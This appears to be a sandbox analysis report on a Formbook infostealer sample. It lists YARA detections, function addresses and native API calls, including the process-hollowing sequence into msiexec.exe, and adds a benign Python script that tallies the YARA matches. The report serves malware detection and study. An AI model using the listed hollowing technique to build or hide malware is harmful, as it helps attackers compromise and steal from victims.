Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
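The two Yara listings above ("Malicious sample detected" and "Yara signature match") repeat the same rule pair across every dump, which hides the useful fact: which processes of the run carry the Formbook payload, and where in their address space. The following is an added example by the editor, not a Joe Sandbox tool, that parses lines in the "Yara signature match" form and folds them into one summary per rule. It reads the dump names by the numbering the report uses consistently (`5_2_...` addresses, `5.2.vbc.exe.400000.0.unpack`): first field = process index, second = dump phase, and for memory dumps the fourth = base address. That reading of the naming scheme is an assumption; the sample lines are copied from this report.

```python
import re
from collections import defaultdict

# Constructed sample: lines taken from the report above (a subset).
SAMPLE_LINES = [
    "Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory",
    "Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory",
    r"Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com",
]

MATCH_RE = re.compile(
    r"^Source: (?P<src>.+?), type: (?P<kind>[A-Z]+) Matched rule: (?P<rule>\S+)(?: (?P<meta>.*))?$"
)
# Assumed field layout (see lead-in): <proc>.<phase>.<id>.<base>.<prot>.<type>.sdmp
SDMP_RE = re.compile(r"^(\d+)\.(\d+)\.\d+\.([0-9A-Fa-f]+)\.[0-9A-Fa-f]+\.[0-9A-Fa-f]+\.sdmp$")
# Assumed field layout: <proc>.<phase>.<image name>.<base>.<n>.unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+)\.([0-9A-Fa-f]+)\.\d+\.unpack$")
AUTHOR_RE = re.compile(r"author = ([^,]+)")


def parse_source(src, kind):
    """Turn a source identifier into {process, phase, base} or {path} for dropped files."""
    if kind == "MEMORY":
        m = SDMP_RE.match(src)
        if m:
            return {"process": int(m.group(1)), "phase": int(m.group(2)), "base": int(m.group(3), 16)}
    elif kind == "UNPACKEDPE":
        m = UNPACK_RE.match(src)
        if m:
            return {"process": int(m.group(1)), "phase": int(m.group(2)), "base": int(m.group(4), 16)}
    elif kind == "DROPPED":
        return {"path": src}
    return None


def summarize(lines):
    """Aggregate matches per rule: which processes, which dropped files, which bases, who wrote the rule."""
    out = defaultdict(lambda: {"author": None, "processes": set(), "bases": set(), "dropped": set()})
    for line in lines:
        m = MATCH_RE.match(line)
        if not m:
            continue
        entry = out[m.group("rule")]
        a = AUTHOR_RE.search(m.group("meta") or "")
        if a and entry["author"] is None:
            entry["author"] = a.group(1).strip()
        info = parse_source(m.group("src"), m.group("kind"))
        if not info:
            continue
        if "path" in info:
            entry["dropped"].add(info["path"])
        else:
            entry["processes"].add(info["process"])
            entry["bases"].add(info["base"])
    # Freeze the sets into sorted lists so callers get stable, comparable output.
    return {
        rule: {
            "author": e["author"],
            "processes": sorted(e["processes"]),
            "bases": sorted(e["bases"]),
            "dropped": sorted(e["dropped"]),
        }
        for rule, e in out.items()
    }


if __name__ == "__main__":
    for rule, e in summarize(SAMPLE_LINES).items():
        bases = ", ".join(hex(b) for b in e["bases"])
        print(f"{rule} ({e['author']}): processes {e['processes']} at {bases}; dropped {e['dropped']}")
```

Run over the full listing, this collapses the 28 lines into one row per rule. Two things stand out in that row: the matches span process indices 4, 5, 6 and 8, which ties the payload to the dropper, its child, and the hollowed msiexec.exe rather than to a single process, and the base 0x401000 for process 5 is the image region itself, consistent with the "process hollowing" signature elsewhere in this report.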
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440688 4_2_00440688
Source: C:\Users\Public\vbc.exe Code function: 4_2_00435148 4_2_00435148
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C38B 4_2_0042C38B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00431940 4_2_00431940
Source: C:\Users\Public\vbc.exe Code function: 4_2_00429BA4 4_2_00429BA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C8C5 5_2_0041C8C5
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8F3 5_2_0041B8F3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C134 5_2_0041C134
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D2AE 5_2_0041D2AE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C8B 5_2_00408C8B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CF5F 5_2_0041CF5F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078905A 5_2_0078905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00773040 5_2_00773040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079D005 5_2_0079D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076E0C6 5_2_0076E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076E2E9 5_2_0076E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00811238 5_2_00811238
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BA37B 5_2_007BA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00777353 5_2_00777353
Source: C:\Users\Public\vbc.exe Code function: 5_2_008163BF 5_2_008163BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00772305 5_2_00772305
Source: C:\Users\Public\vbc.exe Code function: 5_2_007963DB 5_2_007963DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076F3CF 5_2_0076F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AD47D 5_2_007AD47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F443E 5_2_007F443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00781489 5_2_00781489
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A5485 5_2_007A5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B6540 5_2_007B6540
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077351F 5_2_0077351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078C5F0 5_2_0078C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007BA634 5_2_007BA634
Source: C:\Users\Public\vbc.exe Code function: 5_2_00812622 5_2_00812622
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077E6C1 5_2_0077E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00774680 5_2_00774680
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A57C3 5_2_007A57C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077C7BC 5_2_0077C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F579A 5_2_007F579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079286D 5_2_0079286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0077C85C 5_2_0077C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0080F8EE 5_2_0080F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0081098E 5_2_0081098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F5955 5_2_007F5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F394B 5_2_007F394B
Source: C:\Users\Public\vbc.exe Code function: 5_2_007869FE 5_2_007869FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_007729B2 5_2_007729B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00823A83 5_2_00823A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_0081CBA4 5_2_0081CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00797B00 5_2_00797B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076FBD7 5_2_0076FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_007FDBDA 5_2_007FDBDA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02711238 8_2_02711238
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266E2E9 8_2_0266E2E9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026BA37B 8_2_026BA37B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02677353 8_2_02677353
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02672305 8_2_02672305
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266F3CF 8_2_0266F3CF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026963DB 8_2_026963DB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02673040 8_2_02673040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0268905A 8_2_0268905A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0269D005 8_2_0269D005
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266E0C6 8_2_0266E0C6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02712622 8_2_02712622
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267E6C1 8_2_0267E6C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02674680 8_2_02674680
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267C7BC 8_2_0267C7BC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026F579A 8_2_026F579A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02681489 8_2_02681489
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026A5485 8_2_026A5485
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267351F 8_2_0267351F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0268C5F0 8_2_0268C5F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02723A83 8_2_02723A83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02697B00 8_2_02697B00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266FBD7 8_2_0266FBD7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026FDBDA 8_2_026FDBDA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271CBA4 8_2_0271CBA4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0269286D 8_2_0269286D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267C85C 8_2_0267C85C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270F8EE 8_2_0270F8EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026F5955 8_2_026F5955
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026869FE 8_2_026869FE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026729B2 8_2_026729B2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271098E 8_2_0271098E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0268EE4C 8_2_0268EE4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026A2E2F 8_2_026A2E2F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0269DF7C 8_2_0269DF7C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02680F3F 8_2_02680F3F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0267CD5B 8_2_0267CD5B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026A0D3B 8_2_026A0D3B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FDDD 8_2_0270FDDD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EC8C5 8_2_000EC8C5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D8C8B 8_2_000D8C8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D8C90 8_2_000D8C90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D2D90 8_2_000D2D90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D2FB0 8_2_000D2FB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00B96F06 8_2_00B96F06
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 007DF970 appears 68 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00425CA0 appears 138 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0076DF5C appears 96 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0076E2A8 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00425873 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007B3F92 appears 89 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007B373B appears 191 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 026B3F92 appears 105 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 026DF970 appears 81 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 026B373B appears 238 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0266DF5C appears 102 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0266E2A8 appears 38 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044405D NtTerminateProcess, 4_2_0044405D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440058 NtCreateFile, 4_2_00440058
Source: C:\Users\Public\vbc.exe Code function: 4_2_004462A8 NtCreateFile,NtCreateSection,NtMapViewOfSection, 4_2_004462A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004464A8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 4_2_004464A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440568 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 4_2_00440568
Source: C:\Users\Public\vbc.exe Code function: 4_2_004415A8 NtWriteFile,NtCreateSection,NtClose, 4_2_004415A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440688 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 4_2_00440688
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043FEE8 NtAllocateVirtualMemory, 4_2_0043FEE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440C17 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 4_2_00440C17
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440F0A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 4_2_00440F0A
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185EA NtCreateFile, 5_2_004185EA
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760078 NtResumeThread,LdrInitializeThunk, 5_2_00760078
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00760048
Source: C:\Users\Public\vbc.exe Code function: 5_2_007600C4 NtCreateFile,LdrInitializeThunk, 5_2_007600C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007607AC NtCreateMutant,LdrInitializeThunk, 5_2_007607AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F900 NtReadFile,LdrInitializeThunk, 5_2_0075F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F9F0 NtClose,LdrInitializeThunk, 5_2_0075F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0075FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0075FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0075FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0075FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0075FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0075FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0075FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0075FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0075FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0075FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0075FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760060 NtQuerySection, 5_2_00760060
Source: C:\Users\Public\vbc.exe Code function: 5_2_007610D0 NtOpenProcessToken, 5_2_007610D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00761148 NtOpenThread, 5_2_00761148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0076010C NtOpenDirectoryObject, 5_2_0076010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007601D4 NtSetValueKey, 5_2_007601D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F8CC NtWaitForSingleObject, 5_2_0075F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00761930 NtSetContextThread, 5_2_00761930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075F938 NtWriteFile, 5_2_0075F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FA50 NtEnumerateValueKey, 5_2_0075FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FA20 NtQueryInformationFile, 5_2_0075FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FAB8 NtQueryValueKey, 5_2_0075FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FB50 NtCreateKey, 5_2_0075FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FBE8 NtQueryVirtualMemory, 5_2_0075FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760C40 NtGetContextThread, 5_2_00760C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC48 NtSetInformationFile, 5_2_0075FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC30 NtOpenProcess, 5_2_0075FC30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026600C4 NtCreateFile,LdrInitializeThunk, 8_2_026600C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026607AC NtCreateMutant,LdrInitializeThunk, 8_2_026607AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0265FAE8
